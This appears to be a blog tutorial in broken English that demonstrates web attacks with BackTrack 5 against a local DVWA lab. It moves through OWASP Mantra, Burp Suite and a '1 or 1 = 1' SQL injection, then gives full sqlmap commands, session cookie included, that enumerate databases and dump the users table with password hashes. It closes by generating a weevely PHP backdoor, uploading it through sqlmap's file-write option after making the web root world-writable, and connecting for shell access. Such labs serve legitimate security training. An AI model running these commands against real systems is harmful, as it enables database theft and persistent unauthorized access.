I will
Explain about tool mantra in backtrack 5, tool mantra is same with
firefox, it spells the difference tool is there a tool that is used
for hacking, from tool mantra I can get the information gathering and
vulnerability in the web or web application
first, you must start you
apache, with command
root@bt:~# service
apache2 start
Screen Shot,
for, used mantra, you
click in tool at menu backtrack, then if you want to used, you must
aktivated this tool, for command you used
root@bt:/pentest/web/mantra#
./OWASP\ Mantra
screen shot like this
then, if you successfully
to start tool mantra, then will show like this.
Then, for report we use
tool burp suite, this tool will be explain with detail about web,
because report many information can we can get, for tool burp suite,,
screen shot like this
then, now we use tool
mantra, don't forget to aktivated MySql.
Screen shot like this
then you must replace at
security, from high to low, why low, because if security low, we can
know a vulnerability from web or application web
screen shot like this.
Then, if we was to
replace security, now we changed to SQL injection, in Input, you
insert 1 or 1 = 1 then you submit, screen shot.
then there will be red
writing, writing was a mistake
but you don't forget to
change the proxy,
screen shot
replace with “Use Proxy
localhost for all urls”
then at tool burp suite
will show information like this.
and from the information
we can, then we went to the tool sqlmap
to find passwords on
hashing and the results of hashing
use command
root@bt:/pentest/database/sqlmap#
./sqlmap.py -u
"http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit"
--cookie="security=low; PHPSESSID=kto6o5phighh3m06vimv8hota0"
–password
screen shot likethis
to know the existing
database,
use command :
root@bt:/pentest/database/sqlmap#
./sqlmap.py -u
"http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit"
--cookie="security=low; PHPSESSID=kto6o5phighh3m06vimv8hota0"
–dbs
screen shot like this
to know the name of an
existing table
use command
root@bt:/pentest/database/sqlmap#
./sqlmap.py -u
"http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit"
--cookie="security=low; PHPSESSID=kto6o5phighh3m06vimv8hota0"
-D dvwa –tables
screen shot like this
alternative command to
find out the password hashing and password are not experiencing
hashing
use command
root@bt:/pentest/database/sqlmap#
./sqlmap.py -u
"http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit"
--cookie="security=low; PHPSESSID=kto6o5phighh3m06vimv8hota0"
-D dvwa -T users –dump
screen shot
create backdoor with
password, first we must get permission,
used command
root@bt:~# chmod 777 -R
/var/www/dvwa
then now we create a
backdoor
use command
root@bt:~# cd
/pentest/backdoors/web/weevely/
root@bt:/pentest/backdoors/web/weevely#
./weevely.py generate eddy /root/test.php
screen shot like this
then we send to victim
use command
root@bt:/pentest/database/sqlmap#
./sqlmap.py -u
"http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit"
--cookie="security=low; PHPSESSID=kto6o5phighh3m06vimv8hota0"
--file-write=/root/test.php –file-dest=/var/www/dvwa/test.php
screen shot
then we try to backdoor
that we have made earlier, if successful, will enter into the web
system,
use command
root@bt:/pentest/backdoors/web/weevely#
./weevely.py http://localhost/dvwa/test.php jancok
screen shot
then we write command ls
screen shot like this
ok, now we in a system
with backdoor.
0 comments:
Post a Comment